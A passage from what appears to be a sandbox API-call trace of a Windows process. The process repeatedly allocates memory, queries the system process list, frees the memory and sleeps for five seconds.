SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.342] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.359] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.377] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.408] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.415] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.430] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.437] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.444] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.457] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.473] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.481] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.494] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.507] 